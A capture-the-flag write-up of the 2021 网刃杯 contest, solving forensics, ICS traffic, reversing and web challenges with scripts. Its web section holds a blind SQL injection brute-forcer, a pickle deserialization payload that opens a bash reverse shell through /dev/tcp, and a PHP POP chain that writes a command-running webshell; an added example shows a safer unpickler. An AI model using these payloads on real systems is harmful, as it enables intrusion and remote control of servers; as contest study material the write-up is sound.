2021 网刃杯 Writeup

Result

Second place

MISC

This drove me mad, drove me mad, drove me mad.
The private key header was wrong and I was stuck on it for ages; once that was past, the rest was much easier.
Note: encrypted ad1 was solved after the contest.

Sign-in

Unzipping gives flag.txt and a piece of ciphertext.
flag.txt contains zero-width characters.
Tick B, C, D and E (viewing the file in vim shows which ones need to be ticked) to get the hint.
myself turns out to be the MD5 of flag.txt, which floored me.
That gives the key: f71b6b842d2f0760c3ef74911ffc7fdb
Finally, trying Rabbit gives the flag.

flag{WelY0me_2_bOl3an}

baby-usb

Keyboard traffic; just follow this post completely:
http://www.ga1axy.top/index.php/archives/22/
Use the script as-is and copy the steps, which gives

output :
CT[DEL]ONH[DEL]GRATUE[DEL]LATIOKE[DEL][DEL]NSONFINY[DEL]DINGMEBUTIWII[DEL]LLNS[DEL]OTTELLYOUWHERETQA[DEL][DEL]HEPZ[DEL]ASSWORDWS[DEL][DEL]OX[DEL]FWE[DEL]OD[DEL]RDDOC[DEL]CUMENTISGOARFV[DEL][DEL][DEL]NDFINDITAGAIN

The deleted characters turn out to be the KEY:
The key is qazwsxedcrfv

With it the Word document opens.

flag{685b42b0-da3d-47f4-a76c-0f3d07ea962a}
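As an added example (not part of the original writeup or the linked script), this replays the keystroke log above, separating what was left on screen from what was backspaced away; the [DEL] string is taken from the output above and used as constructed test input.

```python
import re

# Constructed sample: the keystroke string recovered above; "[DEL]" marks a
# Backspace press. Used here as the test input for the replay below.
SAMPLE = ("CT[DEL]ONH[DEL]GRATUE[DEL]LATIOKE[DEL][DEL]NSONFINY[DEL]DINGMEBUTIWII[DEL]"
          "LLNS[DEL]OTTELLYOUWHERETQA[DEL][DEL]HEPZ[DEL]ASSWORDWS[DEL][DEL]OX[DEL]"
          "FWE[DEL]OD[DEL]RDDOC[DEL]CUMENTISGOARFV[DEL][DEL][DEL]NDFINDITAGAIN")

TOKEN = re.compile(r"\[DEL\]|.")


def replay_keystrokes(stream):
    """Replay a keystroke log; return (text left on screen, erased text).

    Printable tokens are appended to an edit buffer and each [DEL] removes the
    last buffered character. Erased characters are returned in the order they
    were typed (not the order they were removed), so a word that was typed and
    then backspaced away reads forwards.
    """
    buffer = []      # (char, typing sequence number)
    erased = []
    seq = 0
    for tok in TOKEN.findall(stream):
        if tok == "[DEL]":
            if buffer:   # Backspace on an empty line is a no-op
                erased.append(buffer.pop())
        else:
            buffer.append((tok, seq))
            seq += 1
    erased.sort(key=lambda item: item[1])
    return "".join(ch for ch, _ in buffer), "".join(ch for ch, _ in erased)


if __name__ == "__main__":
    screen, hidden = replay_keystrokes(SAMPLE)
    print("on screen:", screen)
    print("erased   :", hidden)   # THE KEY IS qazwsxedcrfv, run together
```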

Mspaint

Load it in Volatility: imageinfo shows Win7, and pslist shows cmd, mspaint and IE were used. The cmd output says he likes to screenshot images, so: filescan | grep 'png'
Dump it; the file contains only one word: hack.
Then iehistory shows he visited a Baidu Netdisk link. Trying hack on it works, so the password is hack. The downloaded attachment, surprisingly, also has a password.
So look at the picture in memory, using the last method in this link:
https://blog.csdn.net/qq_42880719/article/details/117304586
Since I was afraid of misreading it (mostly because my eyesight is bad), I used a zip cracking tool with a user-defined charset.
I chose 8%R~sSA52!iqp, length 8.

After extracting, it turns out to be written in Python,
so reverse it directly.

Reference: https://blog.csdn.net/weixin_44362969/article/details/105616531
Step 1: python pyinstxtractor.py xxxxx.exe

Step 2: you get a folder
containing struct and xxxxx (neither has an extension).
View struct and xxxxx in hex;
you will find xxxxx is one line shorter than struct.
Copy that line from struct into xxxxx, save xxxxx and add the extension:
xxxxx.pyc

Step 3: use uncompyle6 (I'm on Kali)
uncompyle6 xxxxx.pyc > xxxxx.py

which gives

key = 'xxxxxxxxxxxxxxx'
flag = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
data = ''
for i in range(0, len(flag)):
    # repeating-key XOR, each byte emitted as two hex digits
    data += hex(ord(flag[i]) ^ ord(key[(i % 15)]))[2:].zfill(2)
else:
    print(data.upper())
# the hex the program printed:
data = '12045014240343684450506E5E1E1C165D045E6B52113C5951006F091E4F4C0C54426A52466A165B0122'

Now the key is needed. Since the flag is known to start with flag{, the first 5 bytes of the key can be derived:

f = [18,4,80,20,36]   # first five ciphertext bytes
keys = 'flag{'
for i in range(len(f)):
    print(chr(f[i]^ord(keys[i])),end='')

That gives th1s_; searching the memory image for it directly in WinHex:

keys = 'th1s_1s_th3_k3y'
s = '12045014240343684450506E5E1E1C165D045E6B52113C5951006F091E4F4C0C54426A52466A165B0122'
for i in range(len(s)//2):
    print(chr(int(s[i*2:i*2+2],16)^ord(keys[(i % 15)])),end='')
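Added example (not from the writeup): the same repeating-key XOR, generalised so key bytes are recovered from plaintext known at any offset (here flag{ at the front and } at the end), plus a round trip with the full key; CIPHER_HEX and KEY_LEN are the values found above.

```python
# Added example (not from the writeup): the challenge's repeating-key XOR,
# generalised so key bytes are recovered from plaintext known at any offset.
# CIPHER_HEX and KEY_LEN are the values found above.
CIPHER_HEX = "12045014240343684450506E5E1E1C165D045E6B52113C5951006F091E4F4C0C54426A52466A165B0122"
KEY_LEN = 15


def recover_key_bytes(cipher_hex, known_plain, offset, key_len):
    """Return {key_index: key_char} learned from plaintext known at `offset`.

    Since c[i] = p[i] ^ key[i % key_len], each known p[i] yields key[i % key_len].
    """
    cipher = bytes.fromhex(cipher_hex)
    learned = {}
    for n, ch in enumerate(known_plain):
        i = offset + n
        learned[i % key_len] = chr(cipher[i] ^ ord(ch))
    return learned


def xor_decrypt(cipher_hex, key):
    cipher = bytes.fromhex(cipher_hex)
    return "".join(chr(c ^ ord(key[i % len(key)])) for i, c in enumerate(cipher))


def xor_encrypt(plain, key):
    # the loop the decompiled program ran, kept so the round trip can be checked
    return "".join("%02X" % (ord(p) ^ ord(key[i % len(key)])) for i, p in enumerate(plain))


if __name__ == "__main__":
    # "flag{" at offset 0 pins key[0..4]; the closing "}" at offset 41 pins key[11]
    partial = recover_key_bytes(CIPHER_HEX, "flag{", 0, KEY_LEN)
    partial.update(recover_key_bytes(CIPHER_HEX, "}", len(CIPHER_HEX) // 2 - 1, KEY_LEN))
    print("".join(partial.get(i, "?") for i in range(KEY_LEN)))   # th1s_??????_???
    print(xor_decrypt(CIPHER_HEX, "th1s_1s_th3_k3y"))
```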

Actually the intended way to find the key here is the screenshot command in memory forensics, which shows the key.

flag{20708c15-eb55-4cbc-930b-68de15c55b32}

encrypted ad1

Gained experience, learned something. I was being dumb.
The downloaded file is named ZW5jcnlwdA, which decodes to encrypt.
Combined with the challenge name ad1, it should be an AD1 disk image, and an encrypted one.
Looking at the end of the file, there is a base64 string.

But it is clearly reversed, so copy it out and flip it with a script:

s = '''==gqxEjgKtDzKI/D1ajBJIcxvLrijkUVc28YA3sTmY8Ac+r3fiDWl80a
44vbCwhxf8xwibLU6V1Ek31d7Q8W78VcYS+8Za1+IhG3hQ3NiLkbmqXUzb2M3Ou7
15G1xhX3lvi7Yj2CyTz68WQKzcoTvv4pZU+ISdQdNcoJEQSJhocwQAYgCUowrcMW
AytwCo05H/yUQGTYA7acF8stHPUPScAoWdL/NW5FqASDAJRN7cM/3kR9GWzTw4WI
mS36/C/94OBX1jJQVssAnd1NPD2F9EcX0GS2L9GIzdPyL5kZgZ8I2ShrzGo//HX5
G+IqTcKRqsB5TAOddb4lTp/r6XowLqAY9IZJAGoAR9kcrKNzwsJXn6HZN29ilFTC
VnwRqDpDulps/c2fyInUqsHzZxctm5iiCZRiy1XjcyLrJtRKbTvyfXY1K7D1Q+dg
eKbzHMihscHQiBL+WMG/3Drwsz/vQiXdS7QCpNU230WH0HXZiqItJOfPLrpR5L7g
VPjDC1WRlB2J169jNBIABGoAFCd8AqBrKhkTxfHOGZOugFK5RXT2+9S1rZEGMg5b
xtBgNzeFo9pq2RtXAeWgXcJXSUC9MFnY5fbuToUSOlvsYr4CKk99EFiX7S1YU+Eo
hUTs6hRIXbt6EdzkVQsZbDkgLIrjiOyRXO20Quq/a09PqC/ZqXz+mztjgRvlPYj4
fgNABGoAxIhFqK1LV4121nsmnKfgPLUTEZk1bG05dULkA86/AdRgbJWJ+38/4Z+K
GRT8Kqu2dQ4f47fSp+OQL76S4ur0Vmk2vXHOZqXuZIvBIV/5ZmO8uC5sdyT+Cb+3
19ct8Twfc9lACABWXDG5kijTdzytbabEFmONqNHlOutjTFjGmWOABGoABFWJTb6I
n8Or2leNITMvoTZeew52vTTGfAWmLeNfHh+qgRGt6QmpHt8+YqUyQr6HMFq5bNIH
HeLDiPc6R6/eaiCZ2VYYf8G6G9vfzZLyb4JD8WHP3q4+gPlg+n1xQCsv+t5cGuhL
JhPoD69aIgB0rxiEDzV6zG3SqziFZXjYtyXYpZ2oFEWTbXBMhnTucJXTRrxktXXx
P3e1cRCbX0VZXxpZeLqd62O9s5QnfJJxSsHOaR8YZ2ONVLtotpFB6/WDX392066T
jppXfKSRqD7QMDNO0Xd0nvRYfvAW2T9jsEPxPx2ZCV+JPYu2SKneIYz+QYYcaPA1
zaE+aypIzG6SfCQABIoABAQADIQdDBG79zq8d0RhLOCxVaKSLcSQCTRtETiTLUYU
yYk0WRs709wlDEsm0VsQI+X7HDSxaQJeIBWzZUaAs0ALuIqW4kw5Ny6ZSN1n52HJ
QMEJV50RwrFxjgH5DfLGa7P2nQJWivL02fgBeaGtjkSi86zoPwOmmYnocbP3Ad0t
bQtXECvOEUiz8TsbgalR5bkKpSTmR98NCO9SKAVUN5IM8uOnl2ct/37JLMYa+fGZ
Q3I4ZHZmJN8vOANsnCNs68+QVWtRIo4fAp2QqHpmn/Is8OeOcwEJkwA3HJvJbHLI
w0vleLaqwCP9UfXGHlBbknjJ4Deqb5RqnHQsN383ey+IADewAEQACKAABIApEIIM'''

print(s[::-1])

That gives a base64 string which, on inspection, looks like RSA key material.
Then I opened FTK, the usual tool for disk images, and found that FTK can decrypt; to investigate, I went and generated an AD1 image myself.

So generate an AD1 anyway; remember to encrypt the generated file.
Note that the correct file header should be 41 44.
So delete the base64 at the tail of the challenge file and change the header 00 00 to 41 44.
Then click the Decrypt AD1 option in FTK.
Notice that
it can decrypt with a certificate, so try that.
However, during the contest I never added the -----BEGIN RSA PRIVATE KEY----- header and -----END RSA PRIVATE KEY----- trailer; I kept adding -----BEGIN PRIVATE KEY-----, so it never decrypted. Ugh.
As shown, then save it as a pfx file.
After decrypting, mount the file with FTK.
Here I mounted it as drive H.
The immediate idea is to use the timestamps as binary and convert the binary to ASCII,
so write a script to convert it:

import os
# the mounted image holds 0.crypto ... 391.crypto on drive H
mtimes = ['']*392
for j in range(392):
    mtimes[j] = os.path.getmtime('H:\\'+str(j)+'.crypto')
print(mtimes)
flag = ''
for i in range(392):
    # the timestamp shared by most files is a 0 bit, anything else a 1 bit
    if str(mtimes[i]) == '1629859254.863367':
        flag += '0'
    else:
        flag += '1'
print(flag)
tmp = ''
for k in range(len(flag)):
    tmp += flag[k]
    if len(tmp) == 8:
        print(chr(int(tmp,2)),end='')
        tmp = ''

which gives

You are so cool!!! this is your key: 6a90383cd08c
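Added example, not from the writeup: a decoder for the same mtime-bit scheme that does not need the 0 timestamp read off by eye. It relies on ASCII never setting the top bit of a byte, so the mtime on every 8th file must be the 0 value; a constructed directory written with os.utime() stands in for the mounted H: image.

```python
import os
import tempfile

# Added example (not from the writeup): decode a message hidden in file
# modification times, as in the 392 .crypto files above, without hard-coding
# which timestamp means 0. ASCII never sets the top bit of a byte, so the
# mtime seen on every 8th file (bit 7 of each byte) must be the 0 value.
# A constructed directory written with os.utime() stands in for the H: image.

def bits_from_mtimes(mtimes):
    msb_values = set(mtimes[0::8])
    if len(msb_values) != 1:
        raise ValueError("top bits disagree: not 8-bit ASCII, or files out of order")
    zero_value = msb_values.pop()
    return "".join("0" if t == zero_value else "1" for t in mtimes)

def bits_to_text(bits):
    # 8 bits per character, MSB first; a trailing partial byte is dropped
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits) - 7, 8))

def decode_directory(directory, count, suffix=".crypto"):
    mtimes = [os.path.getmtime(os.path.join(directory, "%d%s" % (j, suffix)))
              for j in range(count)]
    return bits_to_text(bits_from_mtimes(mtimes))

def write_constructed_directory(directory, message, suffix=".crypto"):
    """Constructed fixture: one empty file per bit, its mtime picked by the bit."""
    zero_t, one_t = 1629859254.0, 1629859255.0      # constructed timestamps
    bits = "".join(format(ord(ch), "08b") for ch in message)
    for j, bit in enumerate(bits):
        path = os.path.join(directory, "%d%s" % (j, suffix))
        open(path, "wb").close()
        os.utime(path, (zero_t, one_t if bit == "1" else zero_t))
    return len(bits)

def roundtrip(message):
    with tempfile.TemporaryDirectory() as d:
        return decode_directory(d, write_constructed_directory(d, message))

if __name__ == "__main__":
    print(roundtrip("this is your key: 6a90383cd08c"))
```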

The 392 files are .crypto files.

Use that tool, with this key, to decrypt 0.crypto and 1.crypto (those two have different timestamps).

flag{ba40c40b-1356-4fc6-8cc7-6a90383cd08c}

Protocols

The secret hidden in S7

The downloaded capture is partly corrupted; repair it online with
http://f00l.de/hacking/pcapfix.php
Opening the capture, there is a PNG, but extracting it naively is bound to pull in junk.
So, after looking at it, extract it with tshark:

tshark -r Ks3qlAF1bTuysqpJ.pcap -T fields -e s7comm.resp.data -Y "s7comm.param.func == 0x05 and ip.src==192.168.139.1" > png.txt

That yields hex.
Open 010 Editor, paste the hex in, and you get the image, but the height is obviously wrong, so change it to an arbitrary larger height to get the flag.
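Added example, not from the writeup and going one step beyond it: instead of guessing a height, the IHDR CRC that was left intact can be searched for the height that matches it. The PNG header below is constructed for the demonstration.

```python
import struct
import zlib

# Added example (not from the writeup). The carved PNG had a wrong height in
# its IHDR chunk. Instead of guessing, the untouched IHDR CRC can be searched
# for the height that makes it match. A constructed PNG header is the sample.

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def read_ihdr(data):
    """Return (width, height, stored_crc, ihdr_body) from a PNG byte string."""
    if data[:8] != PNG_SIG or data[12:16] != b"IHDR":
        raise ValueError("not a PNG, or IHDR is not the first chunk")
    length = struct.unpack(">I", data[8:12])[0]          # 13 for IHDR
    body = data[16:16 + length]
    stored = struct.unpack(">I", data[16 + length:20 + length])[0]
    width, height = struct.unpack(">II", body[:8])
    return width, height, stored, body

def ihdr_crc(body):
    # the PNG CRC covers the chunk type and data, not the length field
    return zlib.crc32(b"IHDR" + body) & 0xFFFFFFFF

def recover_height(data, max_height=20000):
    """Height whose IHDR CRC equals the stored CRC, or None if none fits."""
    width, height, stored, body = read_ihdr(data)
    if ihdr_crc(body) == stored:
        return height                                     # already consistent
    for h in range(1, max_height + 1):
        if ihdr_crc(body[:4] + struct.pack(">I", h) + body[8:]) == stored:
            return h
    return None

def build_header(width, height):
    """Constructed sample: signature plus a consistent IHDR for 8-bit RGB."""
    body = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return (PNG_SIG + struct.pack(">I", 13) + b"IHDR" + body
            + struct.pack(">I", ihdr_crc(body)))

def corrupt_height(data, fake_height):
    # overwrite only the 4 height bytes (offset 20..24); the CRC stays as it was
    return data[:20] + struct.pack(">I", fake_height) + data[24:]

if __name__ == "__main__":
    sample = corrupt_height(build_header(640, 480), 100)
    print(read_ihdr(sample)[1], "->", recover_height(sample))   # 100 -> 480
```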

flag{FSfeQefjg}

Seasoned hacker

Compared with the earlier ICS challenge, it is not just similar, it is exactly the same.
Blog of the near-identical original && go follow the ICS expert's blog
Following that blog, the wrong value can be found directly.
Stream 1199 gives 22b8.
Then, observing the earlier streams, the read value is in the 2nd stream after filtering.
Then work out the submission format.

flag{22b81194}

Reverse

reverse1

SM3

Then copy the values from the picture below into the script.

Search Baidu for a national-standard SM3 script:

from math import ceil

##############################################################################
#
# Chinese national standard SM3 hash
#
##############################################################################

IV = "7380166f 4914b2b9 172442d7 da8a0600 a96f30bc 163138aa e38dee4d b0fb0e4e"
IV = int(IV.replace(" ", ""), 16)
a = []
for i in range(0, 8):
    a.append(0)
    a[i] = (IV >> ((7 - i) * 32)) & 0xFFFFFFFF
IV = a


def out_hex(list1):
    for i in list1:
        print("%08x" % i)
    print("\n")


def rotate_left(a, k):
    k = k % 32
    return ((a << k) & 0xFFFFFFFF) | ((a & 0xFFFFFFFF) >> (32 - k))


T_j = []
for i in range(0, 16):
    T_j.append(0)
    T_j[i] = 0x79cc4519
for i in range(16, 64):
    T_j.append(0)
    T_j[i] = 0x7a879d8a


def FF_j(X, Y, Z, j):
    if 0 <= j and j < 16:
        ret = X ^ Y ^ Z
    elif 16 <= j and j < 64:
        ret = (X & Y) | (X & Z) | (Y & Z)
    return ret


def GG_j(X, Y, Z, j):
    if 0 <= j and j < 16:
        ret = X ^ Y ^ Z
    elif 16 <= j and j < 64:
        # ret = (X | Y) & ((2 ** 32 - 1 - X) | Z)
        ret = (X & Y) | ((~ X) & Z)
    return ret


def P_0(X):
    return X ^ (rotate_left(X, 9)) ^ (rotate_left(X, 17))


def P_1(X):
    return X ^ (rotate_left(X, 15)) ^ (rotate_left(X, 23))


def CF(V_i, B_i):
    # compression function: one 64-byte block B_i, chaining value V_i
    W = []
    for i in range(16):
        weight = 0x1000000
        data = 0
        for k in range(i * 4, (i + 1) * 4):
            data = data + B_i[k] * weight
            weight = int(weight / 0x100)
        W.append(data)

    for j in range(16, 68):
        W.append(0)
        W[j] = P_1(W[j - 16] ^ W[j - 9] ^ (rotate_left(W[j - 3], 15))) ^ (rotate_left(W[j - 13], 7)) ^ W[j - 6]
        str1 = "%08x" % W[j]
    W_1 = []
    for j in range(0, 64):
        W_1.append(0)
        W_1[j] = W[j] ^ W[j + 4]
        str1 = "%08x" % W_1[j]

    A, B, C, D, E, F, G, H = V_i
    """
    print "00",
    out_hex([A, B, C, D, E, F, G, H])
    """
    for j in range(0, 64):
        SS1 = rotate_left(((rotate_left(A, 12)) + E + (rotate_left(T_j[j], j))) & 0xFFFFFFFF, 7)
        SS2 = SS1 ^ (rotate_left(A, 12))
        TT1 = (FF_j(A, B, C, j) + D + SS2 + W_1[j]) & 0xFFFFFFFF
        TT2 = (GG_j(E, F, G, j) + H + SS1 + W[j]) & 0xFFFFFFFF
        D = C
        C = rotate_left(B, 9)
        B = A
        A = TT1
        H = G
        G = rotate_left(F, 19)
        F = E
        E = P_0(TT2)

        A = A & 0xFFFFFFFF
        B = B & 0xFFFFFFFF
        C = C & 0xFFFFFFFF
        D = D & 0xFFFFFFFF
        E = E & 0xFFFFFFFF
        F = F & 0xFFFFFFFF
        G = G & 0xFFFFFFFF
        H = H & 0xFFFFFFFF

    V_i_1 = []
    V_i_1.append(A ^ V_i[0])
    V_i_1.append(B ^ V_i[1])
    V_i_1.append(C ^ V_i[2])
    V_i_1.append(D ^ V_i[3])
    V_i_1.append(E ^ V_i[4])
    V_i_1.append(F ^ V_i[5])
    V_i_1.append(G ^ V_i[6])
    V_i_1.append(H ^ V_i[7])
    return V_i_1


def hash_msg(msg):
    # msg is a list of byte values; padding is appended in place
    # print(msg)
    len1 = len(msg)
    reserve1 = len1 % 64
    msg.append(0x80)
    reserve1 = reserve1 + 1
    # 56-64, add 64 byte
    range_end = 56
    if reserve1 > range_end:
        range_end = range_end + 64

    for i in range(reserve1, range_end):
        msg.append(0x00)

    bit_length = (len1) * 8
    bit_length_str = [bit_length % 0x100]
    for i in range(7):
        bit_length = int(bit_length / 0x100)
        bit_length_str.append(bit_length % 0x100)
    for i in range(8):
        msg.append(bit_length_str[7 - i])

    # print(msg)

    group_count = round(len(msg) / 64)

    B = []
    for i in range(0, group_count):
        B.append(msg[i * 64:(i + 1) * 64])

    V = []
    V.append(IV)
    for i in range(0, group_count):
        V.append(CF(V[i], B[i]))

    y = V[i + 1]
    result = ""
    for i in y:
        result = '%s%08x' % (result, i)
    return result


def str2byte(msg):  # convert a string/bytes object to a byte array
    ml = len(msg)
    msg_byte = []
    msg_bytearray = msg  # if the input is a str, call encode() on msg here; otherwise leave it
    for i in range(ml):
        msg_byte.append(msg_bytearray[i])
    return msg_byte


def byte2str(msg):  # byte array to string
    ml = len(msg)
    str1 = b""
    for i in range(ml):
        str1 += b'%c' % msg[i]
    return str1.decode('utf-8')


def hex2byte(msg):  # hex string to byte array
    ml = len(msg)
    if ml % 2 != 0:
        msg = '0' + msg
    ml = int(len(msg) / 2)
    msg_byte = []
    for i in range(ml):
        msg_byte.append(int(msg[i * 2:i * 2 + 2], 16))
    return msg_byte


def byte2hex(msg):  # byte array to hex string
    ml = len(msg)
    hexstr = ""
    for i in range(ml):
        hexstr = hexstr + ('%02x' % msg[i])
    return hexstr


def KDF(Z, klen):  # Z is a bit string in hex (str), klen is the key length in bytes
    klen = int(klen)
    ct = 0x00000001
    rcnt = ceil(klen / 32)
    Zin = hex2byte(Z)
    Ha = ""
    for i in range(int(rcnt)):
        msg = Zin + hex2byte('%08x' % ct)
        # print(msg)
        Ha = Ha + hash_msg(msg)
        # print(Ha)
        ct += 1
    return Ha[0: klen * 2]


def sm3_hash(msg, Hexstr=0):
    """
    Wrapper for external callers
    :param msg: binary stream (to pass a str, encode() it inside str2byte; otherwise leave it)
    :param Hexstr: 0
    :return: 64-hex-digit SM3 digest
    """
    if (Hexstr):
        msg_byte = hex2byte(msg)
    else:
        msg_byte = str2byte(msg)
    return hash_msg(msg_byte)


print('\n')
if __name__ == '__main__':
    enc=['6b8575c6092240cde08414dafd535bee','f0f659f2951290ad5e076b3fe5e70425','c1d6c663570de9fad13ddef955d8a02b','14c4e442fba6d820ea90ae73ed90ad83','25d997669868d0cf89782349256efb33','78b1ea6bb1ac10287864c8f52d2758b6','67d1259c26765356ddb58c6faf28080c','c1e14e0c86f55ba1d74b35b66f96ad36','3e4f3ee942d1a57182e24df201b7022b','c35557f7e5c389061fb2e2ffa1a644ad','15593844fae18fe1a25f3a9017c73810','c6c21ca591a63755fd77bf5c55a0238a','f90cb529875e83cc191c0e10ead6f73e','3ddbe25f9b183c3e2c33c3b1e501fcd8','30fdf04c347f1d4e335bda670d54eaaf','33feb100c8c7c3769af6e9d26486c646']

    import string
    flag=''
    e=''
    map = string.printable
    for i in range(len(enc)):
        for k in map:
            # paste the characters recovered so far into the '' prefix and rerun
            flag=''+k
            # each enc[i] is the first 16 bytes of SM3 over the prefix of length i+1
            if sm3_hash(bytes(str(flag).encode()))[:32]==enc[i]:
                print(flag)

In the 5th line from the end, flag = ''+k: each run prints one character; fill it into the prefix and repeat until the end.
When wel30m_t0_sm3!!! is finally filled in,
the output is empty, so that is the key.

flag{g0042ye_t0_sm4}

2048 mini game

Some game or other; find the logic that involves the flag.
There is an operation I could not identify, but after a few tests, the higher the score, the smaller the value that function produces. So I slowly tuned it and found that a score of 0x2100 just meets the condition. Then that score is XORed with a fixed value to get a number; then the first four values are checked, which are that number reversed; and then it does 0x2100%8+48 and 0x2100/8.

Finally

flag{b0d800402}

web

ez_sql

Shares one small point with Inctf's Rssa, so just adapt that script.

Original link: https://www.yuque.com/docs/share/f2e36905-38ae-4c20-8749-5aba747e5b91?#

# -*- coding: UTF-8 -*-
import requests

def strtohex(s):
    # encode a string as a MySQL hex literal (0x...) so no quotes are needed
    ss = "0x"
    for i in s:
        ss += str(hex(ord(i))).replace("0x",'')
    return ss

burp0_url = "http://116.62.239.41:4323/"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
character = "zsuaqwxcderfvbgtyhnmjuiklop0123456789."

flag = ""
for j in range(1,100):
    for i in character:
        # the first 6 characters are matched from the start; after that a
        # sliding 6-character window is used so the pattern never gets too long
        if j >= 1 and j <=6 :
            payload = strtohex(flag + i + "%")
        else:
            payload = strtohex("%" + flag[-6:] + i + "%")
        sql = "1,2 as username from user where username=0x61646d696e and password like {} union select 1".format(payload)
        params = {
            "sql1":"%27",
            "sql2":sql
        }
        res = requests.get(burp0_url, headers=burp0_headers,params=params)
        print(i + " : " + res.text)
        if "nonono" in res.text:
            print("字符过长!!!")
            exit(0)
        if "nop" in res.text:
            flag += i
            print(flag)
            break
        if i == ".":
            # "." is the last candidate: nothing matched, so the value is complete
            print(flag)
            exit(0)

The flag is 53a2d36d72760586dfc400e54b54564b

ez_web

Points tested: file read, Python deserialization

The HTML source (right-click, view source) has the comment <!-- ?pic=1.jpg -->, which turns out to be an arbitrary file read; reading http://116.62.239.41:4322/?pic=/app/app.py gives the source:

import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file

app = Flask(__name__)

class User():
    def __init__(self,name,age):
        self.name = name
        self.age = age

def check(s):
    if b'R' in s:
        return 0
    return 1


@app.route("/")
def index():
    try:
        user = base64.b64decode(request.cookies.get('user'))
        if check(user):
            user = pickle.loads(user)
            username = user["username"]
        else:
            username = "bad,bad,hacker"
    except:
        username = "CTFer"
    pic = '{0}.jpg'.format(random.randint(1,7))

    try:
        pic=request.args.get('pic')
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()
    except:
        pic='{0}.jpg'.format(random.randint(1,7))
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()

    return render_template('index.html', uname=username, pic=p )


if __name__ == "__main__":
    app.run('0.0.0.0')

Now that it is known to be a Python deserialization bug, the payload from 巅峰极客2021 (opcode) works directly:

import base64
import pickletools

a = b'''(cos
system
S'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'
o.'''

a = pickletools.optimize(a)
print(base64.b64encode(a))
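Added example, not part of the challenge or the writeup: check() only rejects the byte 'R' (the REDUCE opcode), but the OBJ opcode used above, as well as INST, NEWOBJ and BUILD, also invoke callables chosen by the pickle. The constructed payload below is built the same way but calls the harmless builtins.len, so it shows the filter passing while an opcode scan and a find_class restriction both catch it.

```python
import io
import pickle
import pickletools

# Added example (not from the challenge). check() above only rejects the byte
# 'R' (REDUCE), but OBJ ('o'), INST ('i'), NEWOBJ and BUILD also invoke
# callables chosen by the pickle. The payload below is built like the one
# above but calls the harmless builtins.len, so nothing dangerous runs.

# constructed: (MARK, GLOBAL builtins.len, STRING 'abc', OBJ, STOP); no 'R' byte
OBJ_PAYLOAD = b"(cbuiltins\nlen\nS'abc'\no."
BENIGN = pickle.dumps({"username": "CTFer"})      # what a real user cookie holds

# opcodes that import a name or call something while unpickling
CALL_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "OBJ", "INST",
                "NEWOBJ", "NEWOBJ_EX", "BUILD"}

def check(s):
    """The challenge's filter, reproduced unchanged for comparison."""
    return 0 if b"R" in s else 1

def loads_unrestricted(data):
    return pickle.loads(data)            # what app.py does after check()

def dangerous_opcodes(data):
    """Names of call/import opcodes present in a pickle stream, in order."""
    return [op.name for op, _, _ in pickletools.genops(data) if op.name in CALL_OPCODES]

class NoGlobalsUnpickler(pickle.Unpickler):
    # Refuse every global lookup, so no opcode can obtain a callable at all.
    def find_class(self, module, name):
        raise pickle.UnpicklingError("global %s.%s is not allowed" % (module, name))

def safe_loads(data):
    return NoGlobalsUnpickler(io.BytesIO(data)).load()

def is_blocked(data):
    try:
        safe_loads(data)
        return False
    except pickle.UnpicklingError:
        return True

if __name__ == "__main__":
    print("check() passes OBJ payload:", check(OBJ_PAYLOAD) == 1)
    print("flagged opcodes:", dangerous_opcodes(OBJ_PAYLOAD))   # ['GLOBAL', 'OBJ']
    print("pickle.loads ran len('abc') ->", loads_unrestricted(OBJ_PAYLOAD))
    print("safe_loads blocks it:", is_blocked(OBJ_PAYLOAD))
```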


Flag obtained: flag{a806de95e0fd1e1ba5de6ed1ef20adb2}

ez_php

Construct the POP chain as follows:

<?php

class fz
{
    protected $v0id;
    function __construct($v0id){
        $this->v0id = $v0id;
    }
}

class v0id
{
    protected $xin;
    protected $name;
    protected $group;
    protected $url;
    function __construct($group, $name, $url, $xin){
        $this->name = $name;
        $this->group = $group;
        $this->url = $url;
        $this->xin = $xin;
    }
}

class xin
{
    protected $logwriter;
    function __construct($writer){
        $this->logwriter = $writer;
    }
}

class host
{
    protected $filename;
    protected $format;
    function __construct($filename, $format){
        $this->filename = $filename;
        $this->format = $format;
    }
}

class yang
{
    protected $filters;
    protected $endl;
    function __construct($filters, $endl){
        $this->filters = $filters;
        $this->endl = $endl;
    }
}

class c4t {};
$a = new c4t();
$b = new yang($a, "");
$c = new host(new v0id("/../../../../../var/www/html/atao.php", "", "", ""), $b);
$d = new xin($c);
$f = new v0id('<?=`ls`;?>', '../../../../../../var/www/html', "", $d);
$g = new fz($f);
echo urlencode(serialize($g));


Then visit the fffffffffffllllllllaaaag file and download it.

Flag obtained directly: flag{v3rY_Ez_Php_P0p}

Author

n03tAck

Published

2021-09-14

Updated

2021-09-14
